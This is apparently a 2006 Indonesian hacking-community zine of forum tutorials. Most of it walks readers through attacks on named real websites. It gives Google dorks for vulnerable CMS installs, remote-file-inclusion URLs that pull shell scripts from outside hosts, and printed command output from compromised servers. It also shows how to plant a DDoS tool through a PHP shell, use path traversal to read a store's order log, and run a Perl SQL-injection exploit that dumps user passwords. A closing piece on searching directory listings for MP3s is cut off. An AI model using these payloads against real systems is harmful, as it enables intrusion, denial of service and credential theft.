Solo Hacker Link 08

28
TUTORIAL HACKING KOMUNITAS #SOLOHACKERLINK ALLnet + Dalnet 8 Kumpulan tutorial ini kami persembahkan bagi anda yang ingin belajar Hacking, Defacing, Cracking, dan yang berhubungan dengan dunia Komputer. Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini. -ChanServ- Channel: #solohackerlink -ChanServ- Founder: PeNcOpEt_CiNtA, last seen: 5 days (0h 40m 1s) ago -ChanServ- Successor: POM_PONK << ONLINE >> -ChanServ- Registered: 2 years 24 weeks 2 days (1h 31m 55s) ago (2003) -ChanServ- Last Used: 0 seconds ago -ChanServ- Topic: [ www.solohackerlink.cool.to Kirimkan tutorial k-mu disini ] Selamat Menunaikan Ibadah Syaum -ChanServ- Email: [email protected] -ChanServ- Url: www.solohackerlink.s.to atau www.solohackerlink.cool.to -ChanServ- Options: TopicLock, SecureOps, Private, SplitOps, Verbose -ChanServ- Mode Lock: -i CoolMenus Event Remote File Include Vulnerability. CoolMenus Event Remote File Include Vulnerability. by:POM_PONK

Transcript of Solo Hacker Link 08

Page 1: Solo Hacker Link 08

TUTORIAL HACKINGKOMUNITAS #SOLOHACKERLINK

ALLnet + Dalnet

8Kumpulan tutorial ini kami persembahkan bagi anda yang ingin belajar Hacking,

Defacing, Cracking, dan yang berhubungan dengan dunia Komputer.

Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.

-ChanServ- Channel: #solohackerlink-ChanServ- Founder: PeNcOpEt_CiNtA, last seen: 5 days (0h 40m 1s) ago-ChanServ- Successor: POM_PONK << ONLINE >>-ChanServ- Registered: 2 years 24 weeks 2 days (1h 31m 55s) ago (2003)-ChanServ- Last Used: 0 seconds ago-ChanServ- Topic: [ www.solohackerlink.cool.to Kirimkan tutorial k-mu disini ]Selamat Menunaikan Ibadah Syaum

-ChanServ- Email: [email protected] Url: www.solohackerlink.s.to atau www.solohackerlink.cool.to

-ChanServ- Options: TopicLock, SecureOps, Private, SplitOps, Verbose-ChanServ- Mode Lock: -i

CoolMenus Event Remote File Include Vulnerability.

CoolMenus Event Remote File Include Vulnerability.

by:POM_PONK

Page 2: Solo Hacker Link 08

Bagaimana dengan kabar teman-teman semua,masih mau membaca tulisan papi???

Kalo masih sempat silahkan meluangkan waktu sejenak dan -

pahami bahasan pada pertemuan kali ini.

Disini akan papi tulis bagaimana memanfaatkan kelemahan pada:

"/event/index.php?page="

Bagi teman-teman yang sudah bisa silahkan berikan masukan pada papi.

Okay....!!! langsung pada pembahasan....

Silahkan anda semua buka www.google.com

Dan berikan keyword/kata kunci sebagai berikut:

"/event/index.php?page=" site:.net

atau langsung klik URl dibawah ini

http://www.google.co.id/search?hl=id&q=%22%2Fevent%2Findex.php%3

Fpage%3D%22+site%3A.net&meta=

Nah..... banyak banget target yang keluar.

Apakah semua target itu masih bisa kita inject,

Silahkan anda coba satu persatu.

Tapi ingat harus sabar dan ulet.

Sebentar dulu... papi mau nyalain rokok "Djarum super" dulu...

Biar otak papi encer dan tidak mengantuk.

Pussssss...... Gerrr Dag... Juhhhhhhhhhh

MantaB!!!!!!

Page 3: Solo Hacker Link 08

Ini dia salah satu target yang papi pilih dari hasil pencarian.

www.meinbeardie.net/event/index.php?page=artmedic_event1

Konsepnya begini : www.meinbeardie.net/[path]/

event/index.php?page=scriptcode.txt?&cmd=uname -a

Setelah itu kita siapkan scripts injectnya

Silahkan di ambil source code yang telah papi siapkan

www.geocities.com/solohackerlinks/script/pomponk.txt

Langkah berikutnya adalah menggabungkan antara target dengan scripts injectnya

lihat contoh berikut ini:

www.meinbeardie.net/event/index.php?page=http://geocities.com/solohackerlinks/script/

pomponk.txt?&cmd=

Setekah tambahin command Unix,jadinya seperti dibawah ini

www.meinbeardie.net/event/index.php?page=http://geocities.com/solohackerlinks/script/

pomponk.txt?&cmd=ls -a

.

..

admin.php

albums

backend.php

banners.php

cgi-bin

config-old.php

config.php

Page 4: Solo Hacker Link 08

cp

docs

email

error.php

files

footer.php

groupware

header.php

.htaccess

images

includes

index-backup.php

index.php

install

install.php

javascript

lang

language

lifesciences

mail

mailgust

mainfile.php

modules

modules.php

newsletter

pagedbackend.php

pkk

pnadodb

pntables.php

pnTemp

print.php

Page 5: Solo Hacker Link 08

referer.php

robots.txt

smslorg_maindb

test.sql

themes

uploads

user.php

webalizer

web alizer

xmlrpc.php

Itukan isinya banyak banget ...... silah anda lanjutkan sendiri.

sampai disini dulu papi mengetik... sudah terlalu capek neeeh...

Dan jangan lupa kalau dapet shell bagi-bagi sama papi ya....

Thank´s buat teman-teman #solohackerlink semuanya.

by:POM_PONK aka STIAWAN

#SOLOHACKERLINK ALLNET&DALNET

Tulislah Apa Yang Kamu Kerjakan

Post by : POM_PONK on [ 01 May 2006 18:17:01 ]

Page 6: Solo Hacker Link 08

DDOS LEWAT PHPSHELL

DDOS LEWAT PHPSHELL

Layanan IP dan TCP yang bekerja di mesin anda adalah termasuk salah satu

celah yang memikat untuk melancarkan serangan DDOS.

Disini papi mau menulis bagaimana memasang senjata buat DDOS.

Tapi ingat jangan sampai disalah gunakan,karena sangat berbahaya.

Terutama jangan buat DDOS warnet karena papi sendiri kerja diwarnet,

Benar-benar nggak enak kalau lagi user ramai eh tau-tau putus karena kena DDOS.

Langsung saja pada pembahasan kali ini papi asumsikan anda semua sudah tahu,

Bagaimana mencari target yang bisa dipasangi PHPSHELL.

Bagi yang belum mengerti silahkan anda baca pada “OLDDATABASE”

Disana sudah banyak tulisan/tutorial yang membahasnya.

Papi ambil contoh dari salah satu target yang telah papi siapkan

http://www.gotvape.com/test/.pomponk/phphsell.php

(Contoh web yang sudah terpasang phpshell)

Langkah selanjutnya kita upload senjatanya.

http://www.chrisandkristy.com/galbum/.gallery/vadim

Sekarang kita upload dengan menggunakan command wget.

Gambar PHPSHELL yang akan ditanami senjata(vadim)

Page 7: Solo Hacker Link 08

Selanjutnya kita lihat apakah senjata/Vadim yang kita upload sudah masuk!!!

Ketikkan command ls –a

total 92

drwxrwxrwx 2 wwwuser www 4096 Apr 30 11:25 .

drwxr-x--x 67 wwwuser www 8192 Apr 30 11:23 ..

-rwxrwxrwx 1 wwwuser www 64973 Dec 4 23:43 index.html

-rw-r--r-- 1 wwwuser www 5686 Aug 24 2005 phpshell.php

-rw-r--r-- 1 wwwuser www 6114 Jul 28 2005 vadim

Nah… ternyata kita berhasil memasukkan senjata/vadim

Kemudian kita kasih command CHMOD

Ketik begini chmod 755 Vadim

Setelah itu anda bisa menggunakannya dengan perintah begini:

./vadim ip port (./vadim 206.xxx.xxx.xxx 53)

Dan lihatlah apa yang akan terjadi hehehehehe……..

Sampai disini dulu tulisan/tutorial ini papi buat, Mudah-mudahan kita bertemu ditulisan

yang akan datang.

Catatan penting : Penulis tidak bertanggung jawab atas semua resiko yang anda perbuat,

Karena tulisan ini hanya untuk pengetahuan saja.OK!!!

Terima kasih buat Saleho aka PeNcOpEt_CiNtA dan teman-teman

#SOLOHACKERLINK

Page 8: Solo Hacker Link 08

POM_PONK aka STIAWAN

#SOLOHACKERLINK Allnet&Dalnet

(Tulislah apa yang kamu kerjakan)

Post by : POM_PONK on [ 30 April 2006 15:49:36 ]

Bugs Aardvark Topsites PHP 4.2.2

Aardvark Topsites PHP 4.2.2 remote file inclusion --> original take from milw0rm

keyword :

"Powered By Aardvark Topsites PHP 4.2.2"

"alliniurl:/topsite"

Exploit: /sources/join.php?FORM[url =owned&CONFIG[captcha]=1&CONFIG[path]

=injekan

exmple :

Page 9: Solo Hacker Link 08

http://www.miniaturewargaming.com/topsites/sources/join.php?FORM[url]

=owned&CONFIG[captcha]=1&CONFIG[path]

=http://geocities.com/bnkc2006/hack/r57.txt?

Good Luck

Post by : pinguingilo on [ 30 April 2006 10:53:35 ]

My Gaming Ladder Combo System stats.php dir[base]

Variable Remote File Inclusion

My Gaming Ladder Combo System stats.php dir[base] Variable Remote File Inclusion

Hello !!!! Friend..!!!!

saleho aka PeNcOpEt_CiNtA back

kali ini babahe saleho ingin share ilmu ttg hacking

pembahasan kali ini seputar bug yang telah di publish pada tanggal 24 April 2006

(termasuk bug agak baru) yang terjadi pada My Gaming Ladder Combo System stats.php

Page 10: Solo Hacker Link 08

dir[base] Variable Remote File Inclusion

dimana pada file stats.php dapat kita kasih input dengan variabel ´dir[base]´

adapun konsep hackingnya begini

http://[webtarget]/[LadderPath]/stats.php?dir[func]=&dir[base]=inject kamu

dimana kita bisa mengeksekusi perintah dengan script yang telah kita buat.

OK....tidak usah banak basa basi..kita lanjutkan permainan kita. OK..coy...!!!!

pertama kita cari target. seperti biasa kita buka search engine kesayangan kita

www.google.com

ketikkan keywordnya :

allinurl:stats.php "ladder"

inurl:stats.php "ladder"

inurl:ladder filetype:php + "stats"

misalnya teman-teman mendapat target seperti berikut :

cyberconxion.temp.powweb.com/ ladder/stats.php?action=playerdb

selanjutnya kita aplikasikan konsep hack dari Ladder combo System tersebut yang kurang

lebih seperti berikut :

http://cyberconxion.temp.powweb.com/ladder/stats.php?dir[func]=&dir[base]

=http://geocities.com/gen_tho2002/salehor.txt?

kemudian teman-teman perhatikan di browser setelah memberikan input diatas apa yang

terjadi ???

uname -a : FreeBSD clust08-www05.powweb.com 4.11-RELEASE FreeBSD 4.11-

RELEASE #0: Thu May 19 18:34:41 PDT 2005 [email protected]

sysctl :

$OSTYPE :

Server : Apache/1.3.34 (Unix) FrontPage/5.0.2.2635 mod_ssl/2.8.25 OpenSSL/0.9.7d

Page 11: Solo Hacker Link 08

PowWeb/1.1

id : uid=158768(cyberconxion) gid=500(customer) groups=500(customer)

pwd : /www/c/cyberconxion/htdocs/ladder/functions

ls -lia

total 2280

35008842 drwxr-xr-x 3 cyberconxion customer 4096 Apr 27 12:58 .

37997781 drwxr-xr-x 5 cyberconxion customer 4096 Apr 26 17:06 ..

36888082 -rwxr-xr-x 1 cyberconxion customer 7248 Oct 5 2005 WS_FTP.LOG

35008843 -rwxr-xr-x 1 cyberconxion customer 6530 Apr 24 17:36 addmember.php

35008844 -rwxr-xr-x 1 cyberconxion customer 11741 Apr 24 17:36 admin.php

35008845 -rwxr-xr-x 1 cyberconxion customer 7643 Apr 24 17:36 admin_addstaff.php

35008846 -rwxr-xr-x 1 cyberconxion customer 14852 Apr 24 17:36 admin_ban.php

35008847 -rwxr-xr-x 1 cyberconxion customer 5022 Apr 24 17:36 admin_challenge.php

16647897 -rwxr-xr-x 1 cyberconxion customer 16849 Apr 24 17:36

admin_comments.php

16647898 -rwxr-xr-x 1 cyberconxion customer 6262 Apr 24 17:36 admin_createteam.php

16647899 -rwxr-xr-x 1 cyberconxion customer 19065 Apr 24 17:36

admin_editplayer.php

16647900 -rwxr-xr-x 1 cyberconxion customer 12392 Apr 24 17:37 admin_editstaff.php

16647901 -rwxr-xr-x 1 cyberconxion customer 29107 Apr 24 17:37 admin_editteam.php

16647902 -rwxr-xr-x 1 cyberconxion customer 970 Apr 24 17:37

admin_finishmessage.php

16647903 -rwxr-xr-x 1 cyberconxion customer 10779 Apr 24 17:37 admin_games.php

16647904 -rwxr-xr-x 1 cyberconxion customer 86047 Apr 24 17:37 admin_ladders.php

16647905 -rwxr-xr-x 1 cyberconxion customer 8511 Apr 24 17:37

admin_linkmanager.php

16647906 -rwxr-xr-x 1 cyberconxion customer 12155 Apr 24 17:37 admin_maps.php

16647907 -rwxr-xr-x 1 cyberconxion customer 10351 Apr 24 17:37 admin_match.php

Page 12: Solo Hacker Link 08

16647908 -rwxr-xr-x 1 cyberconxion customer 12015 Apr 24 17:37 admin_news.php

16647909 -rwxr-xr-x 1 cyberconxion customer 12566 Apr 24 17:37

admin_reportmatch.php

16647910 -rwxr-xr-x 1 cyberconxion customer 10760 Apr 24 17:37 admin_rules.php

16647911 -rwxr-xr-x 1 cyberconxion customer 47871 Apr 24 17:37

admin_tournament.php

16647912 -rwxr-xr-x 1 cyberconxion customer 4672 Apr 24 17:37 admin_validate.php

61881317 -rwxr-xr-x 1 cyberconxion customer 600 Apr 24 17:37 banner.php

16647917 -rwxr-xr-x 1 cyberconxion customer 20112 Apr 24 17:37 challenge.php

39912411 -rwxr-xr-x 1 cyberconxion customer 11780 Apr 24 17:37 challengefinalize.php

39912414 -rwxr-xr-x 1 cyberconxion customer 7814 Apr 24 17:37 challengeforfeit.php

39912415 -rwxr-xr-x 1 cyberconxion customer 13002 Apr 24 17:37

challengerespond.php

39912416 -rwxr-xr-x 1 cyberconxion customer 20161 Apr 24 17:37 checkdata.php

39912417 -rwxr-xr-x 1 cyberconxion customer 29291 Apr 24 17:37 confirmwin.php

35306905 -rwxr-xr-x 1 cyberconxion customer 30526 Apr 24 17:37 editplayer.php

35306906 -rwxr-xr-x 1 cyberconxion customer 6677 Apr 24 17:37 editteam.php

35306911 -rwxr-xr-x 1 cyberconxion customer 1960 Apr 24 17:37 email.php

31408398 -rwxr-xr-x 1 cyberconxion customer 2429 Apr 24 17:37 email_headers.php

61881318 -rwxr-xr-x 1 cyberconxion customer 594 Apr 24 17:37 error.php

31408401 -rwxr-xr-x 1 cyberconxion customer 743 Apr 24 17:37 finishmessage.php

61881319 -rwxr-xr-x 1 cyberconxion customer 1641 Apr 24 17:37 global.php

37790062 -rwxr-xr-x 1 cyberconxion customer 19273 Apr 22 17:24 horde.log

78248353 -rwxr-xr-x 1 cyberconxion customer 1084 Apr 26 15:36 index.html

31408405 -rwxr-xr-x 1 cyberconxion customer 8704 Apr 24 17:37 invitemember.php

31408406 -rwxr-xr-x 1 cyberconxion customer 4326 Apr 24 17:37 leaveteam.php

31408407 -rwxr-xr-x 1 cyberconxion customer 19164 Apr 24 17:37 loginforms.php

31408408 -rwxr-xr-x 1 cyberconxion customer 37825 Apr 24 17:37 loginsec.php

31408409 -rwxr-xr-x 1 cyberconxion customer 6550 Apr 24 17:37 manageteam.php

31408410 -rwxr-xr-x 1 cyberconxion customer 6505 Apr 24 17:37 matchdb.php

Page 13: Solo Hacker Link 08

31408411 -rwxr-xr-x 1 cyberconxion customer 29907 Apr 24 17:37 newplayer.php

54839269 -rwxr-xr-x 1 cyberconxion customer 162496 Apr 25 06:42 nuwse.php

31408412 -rwxr-xr-x 1 cyberconxion customer 9073 Apr 24 17:37 playerdb.php

31408413 -rwxr-xr-x 1 cyberconxion customer 8435 Apr 24 17:37 players.php

31408414 -rwxr-xr-x 1 cyberconxion customer 2001 Apr 24 17:37 rankadjust.php

31408415 -rwxr-xr-x 1 cyberconxion customer 23366 Apr 24 17:37 reportloss.php

31408416 -rwxr-xr-x 1 cyberconxion customer 37797 Apr 24 17:37 secured.php

31408417 -rwxr-xr-x 1 cyberconxion customer 1662 Apr 24 17:37 sessions.php

75697587 -rwxr-xr-x 1 cyberconxion customer 87615 Dec 19 05:15 shel.php

31408418 -rwxr-xr-x 1 cyberconxion customer 8443 Apr 24 17:37 showchallenge.php

49104511 -rwxr-xr-x 1 cyberconxion customer 8407 Apr 24 17:37 showmatch.php

36888077 -rwxr-xr-x 1 cyberconxion customer 5974 Apr 24 17:37 siteblocks.php

61881320 -rwxr-xr-x 1 cyberconxion customer 2778 Apr 24 17:37 stats.php

36888079 -rwxr-xr-x 1 cyberconxion customer 7657 Apr 24 17:37 teamdb.php

36888080 -rwxr-xr-x 1 cyberconxion customer 1595 Apr 24 17:37 userstats.php

36888081 -rwxr-xr-x 1 cyberconxion customer 6505 Apr 24 17:37 validate.php

75480010 drwxr-xr-x 2 cyberconxion customer 4096 Apr 23 18:39 vhost

tuh kan....apa saleho bilang...hehehhehehe.

temen-temen dapat memberikan perintah unix untuk mengaploud,merename, mengedit

file,dan lain-lain

di tempat yang telah disediakan, tapi ingat !!! jangan merusak usahakan untuk

memberitahu kepada

admin agar segera memperbaiki websitenya.

Ok..sekian dulu yah..itu hanya sekedar salah satu contoh target. babahe udah capek nih

sekali browsing dapet target tersebut, ya..udah babahe buat artikel sekalian aja

hehehehheh

Babahe pamit....mo nulis buku dulu heheheh

salam all viva to SolohackerlinkCrew

Page 14: Solo Hacker Link 08

salam

saleho aka PeNcOpEt_CiNtA

Post by : PeNcOpEt_CiNtA on [ 27 April 2006 20:20:20 ]

nambah - nambah berita ( BUG LAMA )

mungkin untuk om2 yang jago carding udah tahu bug yang ini, ini cuma untuk teman2pemula aja pertama cari di google allinurl:/cgi-bin/store/index.cgi?page= contoh yang didapat dari google www.lilypadbulbs.com/cgi-bin/store/ index.cgi?page=Returns%20and%20Guarantees.htm&cart_id=5745716

buka link yang ditemukan seperti diatas kemudian ganti/isikan dibelakang = menjadi../admin/files/order.log sehingga menjadi www.lilypadbulbs.com/cgi-bin/store/ index.cgi?page=../admin/files/order.log sekian terima kasih

Post by : d3bug on [ 26 April 2006 04:24:47 ] 203.130.206.114

Page 15: Solo Hacker Link 08

Php Myagenda

key >> intitle:phpmyagenda

injek >> agenda.php3?rootagenda=http://injek.org/injek.txt?

contoh : http://www.clme94.org/phpmyagenda/agenda.php3?rootagenda=http://injek.org/injek.txt?

Post by : pinguingilo on [ 26 April 2006 02:42:29 ]

rimot eskiel injeksien

#!/usr/bin/perl

use IO::Socket;

#FlexBB Exploit [ function/showprofile.php ] Remote SQL Injection

#

# 1- First Do Login

# 2- View This Link :D

#

# index.php?page=showprofile&id=-1´ UNION ALL SELECT%

201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM

flexbb_users WHERE id=1/*

#

#-----------------------------------------------#

#

Page 16: Solo Hacker Link 08

#--[ D3vil-0x1 | Devil-00 ]--#

#

# SecurityGurus.net

# Div The PHP Security Fucking Tool :D

##-- Start --#

$host = "127.0.0.1";

$path = "/flexbb/";

$injec = "-1´%20UNION%20ALL%20SELECT%

201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8%20FROM%

20flexbb_users%20WHERE%20id=1/*";

##-- _END_ --##

# $host :-

# The Host Name Without http:// | exm. www.vic.com

#

# $path :-

# FlexBB Dir On Server | exm. /flexbb/

#

# $mycookie :-

# Your Login Info To Forum * Not The Real Password || The Hashed One *

$sock = IO::Socket::INET->new (

PeerAddr => "$host",

PeerPort => "80",

Proto => "tcp"

) or die("[!] Connect To Server Was Filed");

##-- DONT TRY TO EDIT ME --##

Page 17: Solo Hacker Link 08

$evildata = "GET ".$path."index.php?page=showprofile&id=".$injec." HTTP/1.1 ";

$evildata .= "Host: $host ";

$evildata .= "Accept: */* ";

$evildata .= "Keep-Alive: 300 ";

$evildata .= "Connection: keep-alive ";

print $sock $evildata;

while($ans = <$sock>){

$usr_newans = $ans;

$pwd_newans = $ans;

#print $newans;

$usr_newans =~ m/<title>FlexBB - Viewing Profile: (.*?)</title>/ && print "[+]

Username is :- ".$1." ";

$pwd_newans =~ m/<a href="2" target="_blank">(.*?)</a>/ && print "[+] Password is :-

".$1." ";

}

# milw0rm.com [2006-04-24]

Post by : ___tar_gz on [ 25 April 2006 17:51:46 ]

Cara Inject MAMBO versi POM_PONK

Cara Inject MAMBO

Page 18: Solo Hacker Link 08

Disini akan papi terangkan bagaimana menjebol website yang menggunakan mambo.

Langkah yang harus dipersiapkan adalah komputer yang terhubung internet dan buka web

search kesayangan kita. Papi ambil google.com

setelah itu masukkan kata kunci “Buletin/index.php” site:.com (atau kreasi teman2

sendiri)

nah munculkan di list google..... sekarang ambil salah satu target

misal targetna kek gini

http://sulistiawan.sorry.to/Buletin/index.php?option=com_content&task=view&id=17&It

emid=3

Setelah itu buang option=com_content&task=view&id=17&Itemid=3

Sehingga menjadi http://sulistiawan.sorry.to/Buletin/index.php?

Nah.... kalau dah begini kita sisipin bug di belakangna.

_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]

=1&GLOBALS=&mosConfig_absolute_path=

sehabis kita tambahin menjadi kek ini

http://sulistiawan.sorry.to/Buletin/index.php?_REQUEST=&_REQUEST[option]

=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

Kalo dah gini tinggal kita tambahin scripts injectna.

Ini adalah scriptna : http://geocities.com/solohackerlinks/script/pomponk.txt

Jadi kita gabung menjadi begini

http://sulistiawan.sorry.to/Buletin/index.php?_REQUEST=&_REQUEST[option]

=com_content&_REQUEST[Itemid]

=1&GLOBALS=&mosConfig_absolute_path=http://geocities.com/solohackerlinks/script

/pomponk.txt?

Kalo berhasil maka akan keluar halam yang ada kolom buat masukin command unix.

Page 19: Solo Hacker Link 08

Silahkan ketikkan command2 linux dan cari directory yang permisionna kebuka.

Contoh commandna:

-id

-uname -a

-find -perm 777

dan lain sebagainya.

Lebih lanjut silahkan di otak-atik sendiri ya....

Demikian tutorial ini papi buat terima kasih buat teman2 yang telah ngasih kritikan dan

makian di “BUKU TAMU” hehehhe.

POM_PONK aka STIAWAN

Post by : POM_PONK on [ 24 April 2006 19:56:25 ]

Mambo 4.5.1 Vulnerability

setelah mendapat masukan dari teman-teman yang ingin mengetahui teknik hacking

mambo

pada kesempatann ini saya ingin berbagi tip dan trik kepada teman-teman semua

walaupun

teknik ini agak basi :) tapi buat para pemula ini sangat cocok untuk pengetahuan.

seperti yang telah kita lihat sekarang ini, banyak sekali website yang menggunakan CMS

diantaranya dengan menggunakan Mambo dan tanpa disadari bahwa suatu sistem mambo

tersebut

terdapat kelemahannya yakni pada versi 4.5.1 seperti yang dipakai pada salah astu situs

Page 20: Solo Hacker Link 08

ITB waktu yang lalu.

OK...tidak usah panjang lebar kita mulai..

pertama..buka situs kesayangan kita tentunya www.google.com

kemudian berikan keywordnya

allinur:index2.php?option=

inurl:mambo/index.php

inurl:cms/index.php

powered by mambo 4.5.1

atau teman-teman yang mempunyai kata kunci yang lebih spesifik itu lebih baik.

adapun konsep hackingnya sebagai berikut

www.target.com/index.php?_REQUEST=&_REQUEST[option]

=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=inject

kamu

sebagai contoh teman-teman mendapat target seperti berikut :

www.ipoms.or.id/mambo/index.php?option=com_

content&task=view&id=480&Itemid=25

nah..berikan script inject kamu di belakang index.php

sehingga menjadi begini

http://www.ipoms.or.id/mambo/index.php?_REQUEST=&_REQUEST[option]

=com_content&_REQUEST[Itemid]

=1&GLOBALS=&mosConfig_absolute_path=http://geocities.com/gen_tho2002/salehor.t

xt?

Page 21: Solo Hacker Link 08

coba perhatikan apa yang terjadi setelah di beri inject terssebut

uname -a : FreeBSD tiger.indonesiahost.com 5.3-RELEASE FreeBSD 5.3-RELEASE #0:

Sat Mar 4 18:16:38 EST 2006 [email protected]

sysctl :

$OSTYPE :

Server : Apache/2.0.54 (Unix) mod_perl/1.99_17 Perl/v5.8.7 mod_ssl/2.0.54

OpenSSL/0.9.7d FrontPage/5.0.2.2635 PHP/4.4.2 mod_webap

id : user=ipoms uid=10163 gid=10001

pwd : /usr/local/psa/home/vhosts/ipoms.or.id/httpdocs/mambo

15430776 drwxr-xr-x 14 ipoms psacln 1024 16.06.2005 23:08 administrator

15450471 drwxr-xr-x 2 ipoms psacln 512 25.06.2005 17:50 cache

15450476 drwxr-xr-x 2 ipoms psacln 512 16.06.2005 10:46 classes

15450487 drwxr-xr-x 24 ipoms psacln 1024 22.12.2005 17:38 components

15450973 drwxr-xr-x 2 ipoms psacln 512 16.06.2005 10:46 dmdocuments

15450976 drwxr-xr-x 2 ipoms psacln 512 16.06.2005 10:46 documentation

15450981 drwxr-xr-x 3 ipoms psacln 1024 20.12.2005 23:29 downloads

15451009 drwxr-xr-x 5 ipoms psacln 512 16.06.2005 10:46 editor

15451244 drwxr-xr-x 3 ipoms psacln 2048 16.06.2005 13:23 help

15451307 drwxr-xr-x 8 ipoms psacln 512 22.12.2005 10:51 images

15451678 drwxr-xr-x 10 ipoms psacln 1024 29.12.2005 05:15 includes

15451926 drwxr-xr-x 2 ipoms psacln 512 16.06.2005 10:46 language

15451931 drwxr-xr-x 6 ipoms psacln 512 17.06.2005 00:05 mambots

15452148 drwxr-xr-x 2 ipoms psacln 512 22.12.2005 17:38 media

15452152 drwxr-xr-x 5 ipoms psacln 2048 22.12.2005 11:35 modules

15452355 drwxr-xr-x 2 ipoms psacln 512 16.06.2005 10:46 sql

Page 22: Solo Hacker Link 08

15452370 drwxr-xr-x 14 ipoms psacln 512 22.12.2005 12:05 templates

15452785 drwxr-xr-x 2 ipoms psacln 512 16.06.2005 10:46 tmp

15452786 drwxr-xr-x 2 ipoms psacln 512 16.06.2005 10:46 uploadfiles

15431244 -rw-r--r-- 1 ipoms psacln 23872 17.06.2005 00:17 CHANGELOG

15431245 -rw-r--r-- 1 ipoms psacln 2665 29.12.2005 07:24 configuration.php

15431246 -rw-r--r-- 1 ipoms psacln 3752 17.06.2005 00:17 configuration.php-dist

15431247 -rw-r--r-- 1 ipoms psacln 1269 17.06.2005 00:15 globals.php

15431248 -rw-r--r-- 1 ipoms psacln 580 17.06.2005 00:17 htaccess.txt

15431249 -rw-r--r-- 1 ipoms psacln 5332 17.06.2005 00:17 index.php

15431250 -rw-r--r-- 1 ipoms psacln 3365 17.06.2005 00:17 index2.php

15431251 -rw-r--r-- 1 ipoms psacln 453 17.06.2005 00:17 mainbody.php

15431252 -rw-r--r-- 1 ipoms psacln 2005 17.06.2005 00:17 offline.php

15431253 -rw-r--r-- 1 ipoms psacln 451 17.06.2005 00:17 pathway.php

15431254 -rw-r--r-- 1 ipoms psacln 286 17.06.2005 00:17 robots.txt

15431255 -rw-r--r-- 1 ipoms psacln 682 06.07.2004 17:44 version.php

15431256 -rw-r--r-- 1 ipoms psacln 3859 17.06.2005 00:17 INSTALL

15431257 -rw-r--r-- 1 ipoms psacln 18317 17.06.2005 00:17 LICENSE

itu hanya sebagai contoh... teman-teman dapat mencari target yang lain

anda dapat menggunakan command linux untuk membuat perintah seperti aploud, create,

dan lain-lain.

OK...sekidan dulu tapi ingat jangan dirusak kasihann adminnya susah2 buat webnya

hehehehehehee

jagnan di pasang backdoor OK...coy !!!!!

salam

Page 23: Solo Hacker Link 08

saleho aka PeNcOpEt_CiNtA

Post by : PeNcOpEt_CiNtA on [ 24 April 2006 19:49:39 ]

Cara Mencari MP3 Dengan Google.com

Cara Mencari MP3 Dengan Google.com by:POM_PONK

www.google.com adalah web search paling canggih sampai sekarang ini, dengan google

kita bisa mencari

artikel,tutorial,gambar,video,mp3 dan lain sebagainya.

Sebenarnya ada beberapa server IRC yang menyediakan MP3 seperti irc.nullus.net:6667

channel #indomp3 #mp3

Tapi kadang kita bosen nunggu giliran dan belum lagi kalau bot yang tugasnya mengirip

file tau-tau mati.

Mari kita mulai berjelajah dengan mencari string spesifik seperti: mp3 , "index of","last

modified","parent of" dan sebagainya

String tersebut merupakan string yang biasa kita jumpai pada sebuah Directory Listing di

web server .

Directory Listing adalah fitur dari web server yang dapat menampilkan isi sebuah

direktori .

Contohnya seperti di sini .

Jadi sebenarnya kita akan mencari Directory Listing yang berisikan file2 MP3 .

Page 24: Solo Hacker Link 08

Kita akan mencoba membahas bagaimana cara mencari dan menggunakan trik Directory

Listing karena merupakan cara paling umum

digunakan saat ini dan hasilnya cukup bagus.

my_haz_runs di page-nya memberikan 3 format umum yang biasa digunakan dalam

pencarian yaitu :

Type 1 : [Directory String] + (intitle:)[file type] + [mp3 name]

Type 2 : [Directory String] + (inurl:)[file type] + [mp3 name]

Type 3 : [Directory String] + [file type] + [mp3 name] + [limitors]

[Directory String] merupakan string spesifik yang biasa kita jumpai di awal list .

Ada beberapa yang bisa digunakan seperti : "index of","last modified","parent of" .

(inurl) (intitle) : operator pencarian di Google . Kegunaannya dapat dibaca di sini

[file type] adalah jenis file yang akan kita cari .

Direpresentasikan dalam format ekstensi dari file tersebut . Misalnya : MP3 , WMA ,

OGG dsb

[mp3 name] adalah nama file yang akan kita cari . Tidak perlu komplit .

Cukup string tertentu saja yang kira kira unik dan terdapat dalam nama file yang akan kita

cari .

Jadi bisa berupa potongan nama lagu atau nama artisnya .

Misalnya : "Underoath" , "When The Sun Sleep", dll

"limitors" digunakan untuk menyaring result yang kita inginkan dari page yang tidak

diharapkan .

Karena biasanya directory listing ini adalah sebuah direktori alias tidak ada ekstensi maka

kita harus menyaring result yang

Page 25: Solo Hacker Link 08

memiliki ekstensi umum seperti html , php , htm , asp , jsp dan sebagainya .

Kita akan mencoba mencari file MP3 dari band yang kita inginkan , Underoath . String

pencariannya adalah :

"index of" + "mp3" + "Underoath" -html -htm -php

Query tersebut memberikan hasil yang lumayan akurat , salah satunya adalah ini . Jika

kita explore ,

di link tersebut memang ada satu file MP3 dengan Band Underoath

Lalu bagaimana jika kita ingin mendapatkan kumpulan MP3 dari seorang artis saja ,

misalnya Ari lasso .

Gampang ! gunakan saja operator inurl , misalnya inurl:"ari lasso"

akan memberikan result dimana URL-nya terdapat string "ari lasso"

index of" + "mp3" + inurl:"ari lasso" -html -htm -php

Beberapa hasil pencarian mungkin sudah invalid sehingga tidak bisa bisa diakses lagi .

Bagaimana mensiasatinya ??

Gampang doms!!! setiap file di direktori memiliki timestamp yang menunjukkan kapan

terakhir file diupload .

Tinggal kita tambahkan saja string timestamp untuk memperbaiki hasil pencarian .

Di kasus pencarian Ari lasso , sebenarnya saya juga mengalami kendala mendapatkan

hasil yang valid krn sebagian besar sudah

invalid .

Tapi setelah trik "timestamp" ini ditambahkan .. hohohoho...didapat beberapa direktori

yang khusus untuk menyimpan MP3 dari

Ari lasso . Querynya seperti ini

index of" + "mp3" + "2006" + inurl:"Ari lasso" -html -htm -php

Dapat dilihat saya menambahkan angka 2006 sebagai penunjuk bahwa saya

menginginkan hasil terbaru yaitu file yang memiliki

Page 26: Solo Hacker Link 08

